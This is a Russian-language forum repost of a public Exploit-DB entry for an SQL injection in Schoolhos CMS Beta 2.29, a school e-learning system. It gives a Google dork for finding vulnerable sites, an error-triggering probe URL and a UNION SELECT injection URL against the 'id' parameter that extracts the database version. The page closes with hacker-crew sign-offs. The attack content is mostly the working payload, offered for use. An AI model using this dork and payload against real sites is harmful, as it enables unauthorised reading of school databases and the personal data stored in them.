Exploit Schoolhos CMS Beta 2.29 - 'id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22157
Проверка EDB
  1. Пройдено
Автор
CUMI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-10-22
Код:
# Exploit Title: Schoolhos CMS SQL Injetions
# Google Dork: intext:Schoolhos Free Open Source CMS
# Date: 22 Oktober 2012
# Exploit Author: Cumi++
# Vendor Homepage: http://schoolhos.com/
# Version: Beta 2.29
# Tested on: Ubuntu 12.04
# =======================================================

Descripcion : Schoolhos is an education and e-learning CMS, have used by more school..

http://127.0.0.1/schoolhost/index.php?p=info&id='3
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/me/public_html/coretan\tema\hijau\konten.php on line 219

Exploit:
  
    SQL : SQL injection
           http://127.0.0.1/schoolhost/index.php?p=info&id='3'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--Cumi++

========================================================
Its first time..
Salam Rusuh...
Indonesian Coder, Indonesian Hacker, Pekanbaru Cyber..

Tembilahan Coder Crew.
When A Code Can Change The World
 
Источник
www.exploit-db.com

Похожие темы